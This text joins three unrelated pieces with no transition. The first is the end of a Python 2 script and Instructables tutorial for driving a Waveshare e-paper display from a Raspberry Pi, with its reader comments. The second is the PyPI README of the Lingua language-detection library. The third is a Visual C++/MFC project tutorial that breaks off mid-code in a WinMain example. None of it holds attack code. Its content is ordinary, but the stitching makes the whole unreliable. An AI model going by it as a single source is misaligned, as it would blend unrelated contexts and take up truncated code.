LPSTR lpCmdLine, int nCmdShow )
{
return 0;
}
Introduction to MFC
The Microsoft Foundation Class (MFC) library provides
a set of functions, constants, data types, and classes to simplify
creating applications for the Microsoft Windows family of operating
systems.
Practical
Learning: Starting an MFC Application
CObject, the Ancestor of All/Most MFC Classes
To implement its functionality, the MFC is organized
as a hierarchical tree of classes, the ancestor of which is
CObject:
Although you can create C++ classes for your
applications, most of the classes you will use throughout our lessons
descend directly or indirectly from CObject.
The CObject class lays a valuable
foundation that other classes can build on. Using the rules of
inheritance, the functionality of CObject can be
transparently applied to other classes as we will learn little by little.
Some of the features that CObject provides are:
You will hardly use CObject directly
in your program. Instead, you may create your own classes that are based
on CObject. Here is an example:
class CCar : public CObject
{
public:
CCar();
char *Make;
char *Model;
int Year;
long Mileage;
int Doors;
double Price;
};
Practical
Learning: Supporting MFC
CObject Methods
When inheriting a class from CObject,
your class can take advantage of the features of its parent
CObject. This means that you will have available the
functionality laid by its methods. Some of the methods of the
CObject class are:
The objects of an application send messages to the
operating system to specify what they want. The MFC library provides a
special class to manage these many messages. The class is called
CCmdTarget. We will come back to it when dealing with messages.
A Basic Application
To create a program, also called an application, you
derive a class from the MFC's CWinApp class. The
CWinApp class is derived from the CWinThread
class. CWinThread is derived from a class named CCmdTarget,
which is derived from CObject. CWinApp stands for
Class For A Windows Application:
Creating and Managing Classes in Microsoft
Visual Studio
Creating Header and Source Files
One of the most regular actions you perform when working
on a project consists of creating classes. Microsoft Visual Studio provides
various means and tools to assist you with this.
From your knowledge of C++, you can create a class in
different files: a header file and a source file. To create any of these:
Any of these actions would open the Add New Item dialog
box. In the Installed Templates list, click Code. Then,
After naming the file, click Add.
After generating the files, you can use them following
rules and suggestions of the C++ language. For example, you can create the
layout of a class in the header file and define it in the source file.
Creating a Class
As you know from your knowledge of C++, you can create a
stand-alone class or derive one from another existing class. Microsoft
Visual Studio provides all the necessary tools to visually create or derive
a class. To create a class:
Any of these actions would open the Add Class dialog
box:
Make sure C++ Class is selected and click Add. This
would open the Generic C++ Class Wizard. The wizard presents many options:
Once you are ready, click Finish. If you specified that
you are deriving a class, when you click Finish, the wizard would look for
the base class, first in the current project, then in the libraries (if any)
referenced in the project. If the wizard doesn't find the parent class, it
would display a message box. Here is an example:
If know for sure that the class exists or you will
create it later, click Yes. If you click, you will be given the opportunity
of rectifying.
Here is an example of deriving a class from
CWinApp:
class CSimpleApp : public CWinApp
{
};
Because the CWinApp class is defined in
the AFXWIN.H header file, make sure you include that file where
CWinApp is being used.
Practical
Learning: Creating a CWinApp-Based Class
#include <afxwin.h>
class CExerciseApp : public CWinApp
{
};
Managing the Member Variables of a Class
After creating a class, you can manage it. Microsoft
Visual C++ provides various tools to assist you. Managing a class consists
of accessing its file(s), adding member variables, and adding methods.
The Microsoft Foundation Class Library
The Framework
Instead of creating an application using "raw" Win32
classes and functions, the MFC library simplifies this process by providing
a mechanism called the framework. The framework is a set of classes,
functions, and techniques used to create an application as complete as
possible with as few lines of code as possible. To provide all this
functionality, the framework works behind the scenes with the CWinApp
class to gather the necessary MFC classes and functions, to recognize and
reconcile the Win32 classes that the application needs. This reconciliation
is also made possible by a set of global functions. These functions have
names that start with Afx... Some of these functions are:
We will come back to some of these functions and we will
see many other MFC macros in later lessons.
A Global Application Object
To make your application class available and accessible
to the objects of your application, you must declare a global variable from
it and there must be only one variable of your application. This variable is
of the type of the class derived from CWinApp. Here is an example:
class CSimpleApp : public CWinApp
{
};
CSimpleApp MyApplication;
As you can see, you can name this global variable
anything you want. By tradition, in Microsoft Visual C++, this variable is
named theApp. Here is an example:
CSimpleApp theApp;
To get a pointer to this variable from anywhere in your
application, call the AfxGetApp() framework function. Its syntax is:
CWinApp* AfxGetApp();
To implement the role of the Win32's WinMain()
function, the framework uses its own implementation of this function and the
MFC provides it as AfxWinInit(). It is declared as follows:
BOOL AFXAPI AfxWinInit(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow);
As you can see, the Win32's WinMain() and the
MFC's AfxWinInit() functions use the same arguments.
Practical
Learning: Creating a Global Object
#include <afxwin.h>
class CExerciseApp : public CWinApp
{
};
CExerciseApp theApp;
A Window's Instance
When you start an application such as Notepad, you are
said to have created an instance of the application. In the same way, when
you declare a variable of a class, an instance of the class is created and
made available to the project. The WinMain() function also allows you
to create an instance of an application, referred to as the hInstance
argument of the WinMain() function. The instance is created as an
HINSTANCE. The CWinApp class provides a corresponding instance
variable called m_hInstance. This variable can let you get a handle
to the instance of your application. Alternatively, to get a handle to the
instance of your application, you can call the AfxGetInstanceHandle()
global function. Its syntax is:
HINSTANCE AfxGetInstanceHandle();
Even more, to get a handle to your application, you can
call the Win32 API's GetWindowLong() function. Suppose you have
opened Notepad to view the source code of an HTML document. This is said
that you have an instance of Notepad. Imagine that you want to open a text
document using Notepad without closing the first instance of Notepad. To do
this, you must open another copy of Notepad. This second copy of Notepad is
another instance. In this case, the first instance is referred to as a
previous instance. For a Win32 application, the previous instance would be
the hPrevInstance argument of the WinMain() function. For a
Win32 application, the hPrevInstance argument always has the NULL
value. If you want to find out whether a previous instance of an application
already exists, you can call the CWnd::FindWindow() method. Its
syntax is:
static CWnd* PASCAL FindWindow(LPCTSTR lpszClassName, LPCTSTR lpszWindowName);
If you created the window or if it is a window you know
for sure, in which case it could be a WNDCLASS or WNDCLASSEX
object, specify it as the lpszClassName argument. If you do not know
its name with certainty, set this argument as NULL. The lpszWindowName
argument is the possible caption of the window you are looking for. Imagine
you position a button on a dialog box and you want the user to launch
Notepad with that button and imagine that, if Notepad is already opened,
there would be no reason to create another instance of it.
The CWinApp class provides all the
basic functionality that an application needs. It is equipped with a method
called InitInstance(). Its syntax is:
virtual BOOL InitInstance();
When creating an application, you must override this
method in your own class. This method is used to create an application. If
it succeeds, it returns TRUE or a non-zero value. If the application
could not be created, the method returns FALSE or 0. Here is an
example of implementing it:
class CSimpleApp : public CWinApp
{
BOOL InitInstance() { return TRUE; }
};
Based on your knowledge of C++, keep in mind that the
method could also have been implemented as:
struct CSimpleApp : public CWinApp
{
BOOL InitInstance()
{
return TRUE;
}
};
or:
struct CSimpleApp : public CWinApp
{
BOOL InitInstance();
};
BOOL CSimpleApp::InitInstance()
{
return TRUE;
}
Practical
Learning: Instantiating an Application
#include <afxwin.h>
class CExerciseApp : public CWinApp
{
BOOL InitInstance()
{
return TRUE;
}
};
CExerciseApp theApp;
The Command Line
To execute a program, you must communicate its path and
possibly some additional parameters to the compiler. This information is
called the command line information and it is supplied as a string. You need
to keep that in mind although all programs of our lessons will be compiled
inside of Visual C++. The command line information is supplied to the
compiler as the lpCmdLine argument of the WinMain() function.
Internally, Visual C++ creates the path and communicates it to the compiler
when you execute the program. If you want to find out what command line was
used to execute your program, you can call the Win32's GetCommandLine()
function. Its syntax is:
LPTSTR GetCommandLine(VOID);
This function takes no argument but returns the command
line of an application as a null-terminated string.
Introduction to Windows
Resources
Overview
In an MFC application, a resource is a text file that
allows the compiler to manage such objects as pictures, sounds, mouse
cursors, dialog boxes, etc. Microsoft Visual C++ makes creating a resource
file particularly easy by providing the necessary tools in the same
environment used to program. This means you usually do not have to use an
external application to create or configure a resource file (as done in
other programming environments).
Creating a Resource
Although an application can use various resources that
behave independently of each other, these resources are grouped into a text
file that has the .rc extension. You can create this file manually and fill
out all necessary parts but it is advantageous to let Microsoft Visual C++
create it for you. To start creating the resources:
Any of these actions would display the Add Resource
dialog box. From this dialog box, you would select the type of resource you
want and click New (or Import...). You will then be expected to design or
customize the resources. Throughout our lessons, we will see various
examples. After creating or designing a resource, you must save it. In most
cases, you can try closing the resource. In this case, Microsoft Visual C++
would prompt you to save the resource. If you agree to do this (which you
mostly should), Microsoft Visual Studio would create a new file with the
extension .rc.
To make your resource recognizable to the other files of
the program, you must also create a header file, usually called
resource.h. This header file must provide a constant integer that
identifies each resource and makes it available to any part that needs it.
This also means that most, if not all, of your resources will be represented
by an identifier.
Because resources are different entities, they are
created one at a time. They can also be imported from existing files.
The Add Resource dialog box provides an extensive list
of resources to accommodate almost any need. Still, if you do not see a
resource you need and know you can use it, you can add it manually to the
.rc file before executing the program.
Practical
Learning: Creating a Resource
Converting a Resource Identifier
An identifier is a constant integer whose name usually
starts with ID. Although in Win32 programming you usually can use the name
of a resource as a string, in MFC applications, resources are usually
referred to by their identifier. To make an identifier name (considered a
string) recognizable to an MFC (or Win32) function, you use a macro called
MAKEINTRESOURCE. Its syntax is:
LPTSTR MAKEINTRESOURCE(WORD IDentifier);
This macro takes the identifier of the resource and
returns a string that is given to the function that called it. In the strict
sense, after creating the resource file, it must be compiled to create a new
file that has the extension .res. Fortunately, Microsoft Visual C++
automatically compiles the file and links it to the application. | http://www.functionx.com/visualc/Lesson02.htm | CC-MAIN-2015-48 | refinedweb | 3,062 | 60.45 |
Here I will explain how to bind a generic list to a GridView and how to bind database values to a generic list using ASP.NET.
Description:
In a previous article I explained what WCF is and how we can use it in our applications. Now I will explain how to use lists in our applications to bind data to a GridView, and how to bind database values to a generic list using ASP.NET.
First, create a new website and design your aspx page like this:
After that, add one class file to your website. To do that, right-click on your website and select Add New Item. A window will open; in it, select Class file and give the name UserDetails.cs, because I am using this name in this sample. If you want to give it another name, change the UserDetails reference name in your sample.
Now open your class file UserDetails.cs and write the following code:
After you finish writing the code in your class file, open your Default.aspx.cs page and add the following namespaces:
After that, write the following code in the code-behind:
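As a hedged sketch only, the UserDetails class and the code-behind binding typically look something like this. The property names, the grid ID gvDetails, the table name UserInformation, and the connection string are all assumptions for illustration, not the article's actual code:

```csharp
using System;
using System.Collections.Generic;
using System.Data.SqlClient;

// Assumed shape of UserDetails.cs: one property per grid column.
public class UserDetails
{
    public int UserId { get; set; }
    public string UserName { get; set; }
    public string Location { get; set; }
}

public partial class Default : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!IsPostBack)
        {
            var users = new List<UserDetails>();
            using (var con = new SqlConnection("<your connection string>"))
            using (var cmd = new SqlCommand(
                "SELECT UserId, UserName, Location FROM UserInformation", con))
            {
                con.Open();
                using (var reader = cmd.ExecuteReader())
                {
                    while (reader.Read())
                    {
                        // Copy each row into a strongly typed object.
                        users.Add(new UserDetails
                        {
                            UserId = (int)reader["UserId"],
                            UserName = reader["UserName"].ToString(),
                            Location = reader["Location"].ToString()
                        });
                    }
                }
            }
            // Bind the generic list to the GridView.
            gvDetails.DataSource = users;
            gvDetails.DataBind();
        }
    }
}
```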
Demo
13 comments :
nice Article. Every one can understand easily
Does this example work with importing data from multiple tables and displaying in one grid?
I have use above example with multiple tables in select query but it's giving error.
A field or property with the name 'XX' was not found on the selected data source."
Ok all good it does work with multiple tables.. awesome example....
But is this really needed? Can you tell me a live example where we need the generic list, because this can be done by directly binding column fields to grid columns.
Now, how to delete an item from the generic list and bind it to the grid again?
You are showing the strength of Telugu people.. on Google, everyone is reading only your ASP articles... keep rocking Suresh.... all the good luck....
Sir Can You Please Help Me Out in Binding the Data from datatable in mysql to ListView in C# Windows Application...
Congratulations for your blog! It is really useful.
Can you explain how to fill only first column and first row with data from sql server?
Sorry for my english. Thank you!
How to store rows one by one dynamically in a two-dimensional array and display them in ASP.NET using C#?
Please help me.
Hi
Subject:
Rebind the grid when a table record is updated on our side or by any other user.
Read the scenario carefully.
I have a grid and bind it using LINQ. Now, when I update a record in the grid, I rebind and get the updated record. But the problem is this: when another user changes the record, and I try to update it without refreshing the grid, I see the old record in the grid. I want a solution where, whenever the table data changes, either on my side or on another user's side, a trigger fires and the grid rebinds automatically.
Is it possible? I already know how to bind the grid, so please do not post that as a solution.
HI,
Nice post. Whenever I have any doubt in ASP.NET with C#, most of the time I refer to your blogs only. They are easy to understand.
Sir, this is Abhinav Singh993. Please tell me, is it possible to perform CRUD operations using a generic list in ASP.NET with C#, or is it only for displaying data? If possible, please provide a tutorial on it. Thank you.
How to insert values into the database using a stored procedure and a List<>?
Please help me.
replica is a tiny library for creating copies of case classes with updated values using reflection.
The main use case for this library is a flat class hierarchy of case classes extending an abstract base class that defines some common fields. Case class copy methods are generated by the compiler and cannot be accessed from the base class. replica offers a simple way to update values defined in a base class without writing boilerplate code for each case class.
## Installation
replica is available from the Maven Central repository. The latest release is 0.0.2 and is built against Scala 2.11.7.
If you use SBT you can include replica in your project with
libraryDependencies += "com.mthaler" %% "replica" % "0.0.2"
## Usage
import com.mthaler.replica.Replicator abstract class HasName extends Product { def name: String } case class Person(name: String, age: Int) extends HasName case class Pet(name: String) extends HasName implicit class RichHasName[T <: HasName](value: T) { def withName(name: String) = Replicator.copy(value, Map("name" -> name)) } Person("Richard Feynman", 42).withName("Paul Dirac")
The result is
Person("Paul Dirac", 42).
## License

replica is licensed under APL 2.0.
Combining parts of full file path in C# .NET
The Path class in the System.IO namespace provides a number of useful filepath-related methods. Say that you have the following ingredients of a full file path:
string drive = @"C:\"; string folders = @"logfiles\october\"; string fileName = "log.txt";
You can combine them into a full path using the Path.Combine method:
string fullPath = Path.Combine(drive, folders, fileName);
“fullPath” will be correctly set to C:\logfiles\october\log.txt. Path.Combine treats the individual parameters as path fragments and does its best to concatenate them, but it does more than just concatenate the strings.
Be careful when using drive names though. If you run the above example with
string drive = @"C:";
…i.e. omit the trailing slash, then Path.Combine will not insert it automatically, and “fullPath” will be C:logfiles\october\log.txt. If you omit the trailing slash from a folder name, however, Path.Combine will insert it for you.
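To see the difference concretely, here is a small console sketch of the cases described above. The expected outputs in the comments reflect the classic .NET Framework Path.Combine behavior on Windows:

```csharp
using System;
using System.IO;

class PathCombineDemo
{
    static void Main()
    {
        // Trailing slash on the drive: a proper full path results.
        Console.WriteLine(Path.Combine(@"C:\", @"logfiles\october\", "log.txt"));
        // C:\logfiles\october\log.txt

        // No trailing slash after the drive letter: Path.Combine does not add one.
        Console.WriteLine(Path.Combine(@"C:", @"logfiles\october\", "log.txt"));
        // C:logfiles\october\log.txt

        // A missing slash after a folder name, however, is inserted automatically.
        Console.WriteLine(Path.Combine(@"C:\logfiles", "october", "log.txt"));
        // C:\logfiles\october\log.txt
    }
}
```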
Let’s see another example:
fullPath = Path.Combine(@"C:\logfiles", "october", "log.txt");
fullPath will be correctly set to C:\logfiles\october\log.txt.
View all various C# language feature related posts here.
A group blog from members of the VB team
It’s been a while since I wrote one of these XML cookbook entries. Here’s some info on a common problem: Really big XML files.
I’m going to show you two things in this recipe. The first is a tip on reading very large XML files while still being able to use XML Axis Properties. The second is how to make the file available to LINQ queries by exposing it as IEnumerable.
How do you read an enormous XML file then? You use the XmlReader class, which has been around since the first release of the .NET Framework. It reads through an XML file, but simply places a pointer on the current XML element or attribute as you go through the file. As you read through the file with the XmlReader object, you can examine the current XML, decide if you are interested in it, process it, discard it, and move on to the next part of the file. The important thing is that you can minimize how much memory is utilized at any one time in your app.
Take heed: you still need to be aware of how you are reading through the file. If you open an XmlReader, read to the root element, then load that entire element into memory you haven’t solved anything.
Now you may be saying that if you use an XmlReader object, you don’t get all of the cool functionality of XML Axis Properties. That’s true, and that’s why there’s a ReadFrom method that reads the XML from your XmlReader into an XNode, which you can then cast as an XElement object and make use of all of the VB XML juicy goodness. Using an XmlReader and the ReadFrom method together ensures that you only use as much memory as the largest XML element that you load.
Let’s look at an example. The app that I was working on was reading through XML files that contained reflection information from .NET assemblies. For each member of a particular class, there was an <api> element. Within that <api> element there was a bunch of information about that member, and my app needed to grab some of the info for use in summary counts. Here’s an abbreviated XML sample of what the data looked like.
<reflection>
<apis>
<api id="M:Microsoft.VisualBasic.Strings.Mid(System.String,System.Int32)">
<apidata name="Mid" group="member" subgroup="method" />
<containers>
<namespace api="N:Microsoft.VisualBasic" />
<type api="T:Microsoft.VisualBasic.Strings" ref="true" />
</containers>
</api>
<api id="M:Microsoft.VisualBasic.Strings.Mid(System.String,System.Int32,System.Int32)">
<apidata name="Mid" group="member" subgroup="method" />
<containers>
<namespace api="N:Microsoft.VisualBasic" />
<type api="T:Microsoft.VisualBasic.Strings" ref="true" />
</containers>
</api>
</apis>
</reflection>
Here’s some code to read through each <api> element, one at a time, with an XmlReader object. Once I have loaded the <api> element into an XElement object, I can use XML Axis properties to get values from the XML contained in the element. The most memory that I use is determined by the largest <api> element rather than the entire file.
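A minimal sketch of the approach just described might look like the following. The file path is illustrative, and the loop assumes whitespace between sibling <api> elements, as in a typical indented file:

```vbnet
Imports System.Xml
Imports System.Xml.Linq

Module ReadLargeXml
    Sub Main()
        Using reader As XmlReader = XmlReader.Create("reflection.xml")
            ' Read to each <api> element in turn...
            While reader.ReadToFollowing("api")
                ' ...and load just that one element into memory.
                Dim api = TryCast(XElement.ReadFrom(reader), XElement)
                ' XML Axis Properties now work on this element alone.
                Console.WriteLine(api.<apidata>.@name)
            End While
        End Using
    End Sub
End Module
```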
Now this code simply reads to the first <api> element and then reads all of its sibling <api> elements. If one of the <api> elements has a child <api> element, that child element gets loaded in the call to the ReadFrom method and the XmlReader object’s pointer moves past it. This works fine for my app because none of the <api> elements have child <api> elements. You may have different requirements and need to adjust your code.
I ran this code on a 5MB file with a little less than 30,000 <api> elements. Loading the entire file into memory consumed over 120MB. Using the XmlReader, the code consumed less than 1MB. I gathered memory stats using the GetTotalMemory method.
One last thing to note in this section is that you can also run into memory issues when writing to a file. If you create a large XDocument in memory, and then write it to a file, you end up consuming the memory required to create the document, which is likely unnecessary. You have a couple of choices to minimize your memory footprint while writing an XML file. Similar to using the XmlReader class and the ReadFrom method, you can use the XmlWriter class and the WriteTo method. As another option, you can use the XStreamingElement class to write a single element at a time from an enumerable source, such as a LINQ query.
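As a quick illustration of the second option, XStreamingElement pulls from an enumerable source only as the file is written. The element names and count here are made up:

```vbnet
Imports System.Linq
Imports System.Xml.Linq

Module StreamingWriteDemo
    Sub Main()
        ' The source is enumerated lazily, one element at a time.
        Dim apis = Enumerable.Range(1, 100000). _
                   Select(Function(i) New XElement("api", New XAttribute("id", i)))

        ' Unlike XElement, XStreamingElement does not build the whole
        ' tree in memory; elements are produced while saving.
        Dim root As New XStreamingElement("apis", apis)
        root.Save("apis.xml")
    End Sub
End Module
```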
In addition to having a small memory footprint, I also wanted to be able to use LINQ to query a large XML file. This can be achieved by creating a class that implements the IEnumerable interface. By fitting the code that I would have used to loop through the XML file into a class that implements IEnumerable(Of XElement), I can use an instance of that class as the source of any number of LINQ queries.
What I’ve created for this step is almost exactly the same as the class created by this walkthrough: Walkthrough: Implementing IEnumerable(Of T) in Visual Basic . The walkthrough shows you how to implement IEnumerable(Of String) to expose the contents of a text file one line at a time. We’ll do the same with an XML file.
When you implement IEnumerable, you actually need to implement both IEnumerable and IEnumerator. The bulk of your code goes into the IEnumerator implementation. You could create one class that implements both, but I like to split them into two classes.
I’ve called the class that implements IEnumerable(Of XElement) XmlReaderEnumerable. Following that naming convention I’ve called the class that implements IEnumerator(Of XElement) XmlReaderEnumerator. The behavior is the same as the earlier XmlReader example. The XmlReaderEnumerator class finds the first instance of a particular element, and then finds all of its sibling elements of the same name. As a result, I’ve added a constructor that takes both the path to the XML file, and the name of the XML element to search for. Note that the name is case sensitive as XML is case sensitive.
The XmlReaderEnumerable class doesn’t do much. All it does is return a reference to an instance of the XmlReaderEnumerator class. Here’s the code.
Public Class XmlReaderEnumerable
    Implements IEnumerable(Of XElement)

    Private _filePath As String
    Private _elementName As String

    Public Sub New(ByVal filePath As String, ByVal elementName As String)
        _filePath = filePath
        _elementName = elementName
    End Sub

    Public Function GetEnumerator() As IEnumerator(Of XElement) _
        Implements IEnumerable(Of XElement).GetEnumerator

        Return New XmlReaderEnumerator(_filePath, _elementName)
    End Function

    Private Function GetEnumerator1() As IEnumerator _
        Implements IEnumerable.GetEnumerator

        Return Me.GetEnumerator()
    End Function
End Class
The XmlReaderEnumerator class is where the code resides to read through the XML file. In the constructor, it opens the file and moves to the start of the XML content. In the MoveNext method, it reads to the element of the supplied name (for example, “api”). In the Dispose method, it closes the reader. That’s it. It looks like a lot of code, but it really isn’t.
Public Class XmlReaderEnumerator
    Implements IEnumerator(Of XElement)

    Private _filePath As String
    Private _elementName As String
    Private _xmlReader As Xml.XmlReader

    Public Sub New(ByVal filePath As String, ByVal elementName As String)
        _filePath = filePath
        _elementName = elementName
        _xmlReader = Xml.XmlReader.Create(_filePath)
        _xmlReader.MoveToContent()
    End Sub

    Private _current As XElement

    Public ReadOnly Property Current() As XElement _
        Implements IEnumerator(Of XElement).Current
        Get
            If _xmlReader Is Nothing OrElse _current Is Nothing Then
                Throw New InvalidOperationException()
            End If
            Return _current
        End Get
    End Property

    Private ReadOnly Property Current1() As Object _
        Implements IEnumerator.Current
        Get
            Return Me.Current
        End Get
    End Property

    Public Function MoveNext() As Boolean _
        Implements System.Collections.IEnumerator.MoveNext

        _current = If(_xmlReader.ReadToFollowing(_elementName), _
                      TryCast(XElement.ReadFrom(_xmlReader), XElement), _
                      Nothing)
        Return If(_current IsNot Nothing, True, False)
    End Function

    Public Sub Reset() _
        Implements System.Collections.IEnumerator.Reset

        _xmlReader.Close()
        _current = Nothing
    End Sub

    Private disposedValue As Boolean = False

    Protected Overridable Sub Dispose(ByVal disposing As Boolean)
        If Not Me.disposedValue Then
            If disposing Then
                ' Dispose of managed resources.
                _current = Nothing
                _xmlReader.Close()
            End If
        End If
        Me.disposedValue = True
    End Sub

    Public Sub Dispose() Implements IDisposable.Dispose
        Dispose(True)
        GC.SuppressFinalize(Me)
    End Sub

    Protected Overrides Sub Finalize()
        Dispose(False)
        MyBase.Finalize()
    End Sub
End Class
Now you can read through a large XML file using LINQ queries like the following example.
Dim numAPIs = _
    Aggregate api In New XmlReaderEnumerable(filePath, "api") Into Count()

Dim vbAPIs = From api In New XmlReaderEnumerable(filePath, "api") _
             Where api.<containers>.<namespace>.@api = "N:Microsoft.VisualBasic"
I have just returned from Santa Cruz where we held the semiannual Standards meeting on C++. I spent most of my time in the Library Working Group discussing new features for the next Library Extensions Technical Report. I have reported on some of the main topics below.
Move semantics
Move semantics promises to significantly increase run-time efficiency of many library elements — in some cases by a factor of 10+. The proposal has generated a lot of discussion for years and is finally bearing fruit. It originates in the Core Working Group but mainly affects the Library. Changes are 100% compatible with existing code, while introducing a fundamental new concept into C++.
This proposal augments copy semantics. A user might define a class as copyable and movable, copyable but not movable, movable but not copyable, or neither. For some types, such as plain old data structures (PODs), move and copy are identical operations (right down to the machine instruction level).
This paper proposes the introduction of a new type of reference that will bind to an rvalue:
struct A {/*...*/};
void foo(A&& i); // new syntax
The && is the token which identifies the reference as an "rvalue reference" (bindable to an rvalue) and thus distinguishes it from our current reference syntax (using a single &).
The rvalue reference is a new type, distinct from the current (lvalue) reference. Functions can be overloaded on A& and A&&, requiring such functions each to have distinct signatures.
The most common overload set anticipated is:
void foo(const A& t); // #1
void foo(A&& t);      // #2
The rules for overload resolution are (in addition to the current rules):
- rvalues prefer rvalue references.
- lvalues prefer lvalue references.
Tuples
Tuples are fixed-size heterogeneous containers containing any number of elements. They are a generalized form of std::pair. The proposal originates in the Core Working Group from a Boost Library [1] implementation, but it will mainly affect the Library.
The proposed tuple types:
Support a wider range of element types (e.g. reference types).
Support input from and output to streams, customizable with specific manipulators.
Provide a mechanism for ‘unpacking’ tuple elements into separate variables.
The tuple template can be instantiated with any number of arguments from 0 to some predefined upper limit. In the Boost Tuple library, this limit is 10. The argument types can be any valid C++ types. For example:
typedef tuple< A, const B, volatile C, const volatile D > t1;
An n-element tuple has a default constructor, a constructor with n parameters, a copy constructor and a converting copy constructor. By converting copy constructor we refer to a constructor that can construct a tuple from another tuple, as long as the type of each element of the source tuple is convertible to the type of the corresponding element of the target tuple. The types of the elements restrict which constructors can be used:
If an n-element tuple is constructed with a constructor taking 0 elements, all elements must be default constructible.
For example:
class no_default_ctor { no_default_ctor(); };
tuple<no_default_ctor, float> b; // error - need default ctor
tuple<int&> c;                   // error - no reference default ctor
tuple<int, float> a;             // ok
If an n-element tuple is constructed with a constructor taking n elements, all elements must be copy constructible and convertible (default initializable) from the corresponding argument. For example:
tuple<int, const int, std::string>(1, 'a', "Hi"); // ok
tuple<int, std::string>(1, 2);                    // error
If an n-element tuple is constructed with the converting copy constructor, each element type of the constructed tuple type must be convertible from the corresponding element type of the argument.
tuple<char, int, const char(&)[3]> t1('a', 1, "Hi");
tuple<int,float,std::string> t2 = t1; // ok
The argument to this constructor does not actually have to be of the standard tuple type, but can be any tuple-like type that acts like the standard tuple type, in the sense of providing the same element access interface. For example,
std::pair is such a tuple-like type. For example:
tuple<int,int> t3 = make_pair('a',1); // ok
The proposal includes tuple constructors, utility functions, and ways of testing for tuples. The I/O streams library will be updated to support input and output of tuples. For example,
cout << make_tuple(1,"C++");
outputs
(1 C++)
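The ‘unpacking’ mechanism listed among the goals above survived into the standard library as std::tie. A small sketch of how it reads today (the function here is made up for illustration):

```cpp
#include <string>
#include <tuple>

// Returns two values at once; callers use std::tie to unpack them
// into separate, already-declared variables.
inline std::tuple<int, std::string> lookup() {
    return std::make_tuple(42, std::string("answer"));
}
```

Writing `int n; std::string s; std::tie(n, s) = lookup();` leaves n == 42 and s == "answer".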
Hash Tables
Hash tables almost made it into the first issue of the Standard, but our deadline precluded doing due diligence on the proposal at the time.
The current proposal is what you would expect and is compatible with the three main library implementations for hash tables: SGI/STLport, Dinkumware, and Metrowerks. What is new is that things like max_factor, load_factor, and other constants are now treated as hints. Each implementation is free to deal with them as it sees fit. Also, most double values and parameters are going to be float. It was felt that only one or two significant digits were meaningful, so the extra space needed by double was wasted.
There was one major outstanding issue. Since there are already widespread hash library implementations in use, how do we avoid breaking existing code? Proposals included making the new hash library names slightly different, or placing them in different namespaces, or usurping the current names because only the committee has the authority to place things in namespace std (any private implementation that placed their hash library into std was, by definition, in error).
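For the record, the committee ended up taking the "slightly different names" route: the containers shipped in TR1 and then C++11 as unordered_map and friends, keeping the float-valued hints described above:

```cpp
#include <string>
#include <unordered_map>

// load_factor() and max_load_factor() traffic in float, and the
// requested maximum is treated as a hint the container honors by
// rehashing as elements are inserted.
inline float fill_and_measure() {
    std::unordered_map<std::string, int> m;
    m.max_load_factor(0.75f);
    m["one"] = 1;
    m["two"] = 2;
    return m.load_factor();
}
```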
Polymorphic Function Object Wrapper
This proposal is based on the Boost Function Template Library [1]. It was accepted in Santa Cruz for inclusion in the next TR of the standard. It introduces a class template that generalizes the notion of a function pointer to subsume function pointers, member function pointers, and arbitrary function objects while maintaining similar syntax and semantics to function pointers. For example:

function<int (int, int)> f;
f = plus<int>();
cout << f(2, 3) << endl; // outputs 5
f = minus<int>();
cout << f(2, 3) << endl; // outputs -1
The proposed function object wrapper supports only a subset of the operations supported by function pointers with slightly different syntax and semantics. The major differences are detailed below, but can be summarized as follows:
Relaxation of target requirements to allow conversions in arguments and result type.
Lack of comparison operators. However, checking if (f) and if (!f) is allowed.
Lack of extraneous null-checking syntax. The function class template is always a function object.
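The first relaxation is easy to demonstrate with the wrapper as it was eventually standardized (std::function): the stored target's argument and result types only need to be convertible to those of the signature, something a plain function pointer cannot offer:

```cpp
#include <functional>

inline long twice(long x) { return 2 * x; }

// A long(long) target stored behind a double(int) signature:
// int converts to long on the way in, long converts to double
// on the way out.
inline std::function<double(int)> make_wrapped() {
    return std::function<double(int)>(twice);
}
```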
Conclusions
This short report did not touch on other exciting new features that will likely appear in the language, including the Regular Expression proposal, the use of static assertions to allow more extensive compile-time checking based on type information, and the auto expressions proposal to simplify template function definitions.
As you can see from the wide range of topics we discussed in Santa Cruz, C++ is still an exciting language that is continuing to adapt to users’ needs.
Reg Charney
References
[1] The Boost Library:
This article was originally published on the ACCU USA website in November 2002 at
Thanks to Reg for allowing us to reprint it. | https://accu.org/index.php/journals/2013 | CC-MAIN-2018-13 | refinedweb | 1,145 | 50.36 |
Project references break on XAML save. Potentially Intellisense bug?
Related to Desk case 241961
Steps to Reproduce
============
Make a change to XAML file and save.
See screencast:
Actual Results
=========
Introduces 200+ errors:
> The type or namespace name 'Tether' does not exist in namespace 'INRIX' (are you missing an assembly reference?)
Expected Results
===========
Project should build with no further errors.
Other information
===========
Version info:
Microsoft Visual Studio Enterprise 2015
Version 14.0.24720.00 Update 1
Microsoft .NET Framework
Version 4.6.01038
Installed Version: Enterprise
Architecture and Modeling Tools 00322-80000-00000-AA869
Microsoft Architecture and Modeling Tools
UML® and Unified Modeling Language™ are trademarks or registered trademarks of the Object Management Group, Inc. in the United States and other countries.
Visual Basic 2015 00322-80000-00000-AA869
Microsoft Visual Basic 2015
Visual C# 2015 00322-80000-00000-AA869
Microsoft Visual C# 2015
Visual C++ 2015 00322-80000-00000-AA869
Microsoft Visual C++ 2015
Application Insights Tools for Visual Studio Package 1.0
Application Insights Tools for Visual Studio
ASP.NET and Web Tools 2015.1 (Beta8) 14.1.11106.0
ASP.NET and Web Tools 2015.1 (Beta8)
ASP.NET Web Frameworks and Tools 2012.2 4.1.41102.0
For additional information, visit
ASP.NET Web Frameworks and Tools 2013 5.2.30624.0
For additional information, visit
Xamarin 4.0.0.1717 (1390b70) 6.0.0.35 (d300845)
Visual Studio plugin to enable development for Xamarin.Android.
Xamarin.iOS 9.3.99.33 (ea30b32)
Visual Studio extension to enable development for Xamarin.iOS.
XamlStylerVSPackage 1.0
Xaml Styler.
I suspect this is a duplicate of Bug 32988.
One way to check if this is indeed a duplicate of Bug 32988 would be to downgrade the customer's example project temporarily to Xamarin.Forms 1.4.3 and see if the problem stops. If the problem does stop, this can be marked as a duplicate of Bug 32988.
I will mark the bug as "need info" pending that test.
(Side note: the links attached to this bug privately so far are just version information. No sample project is attached yet.)
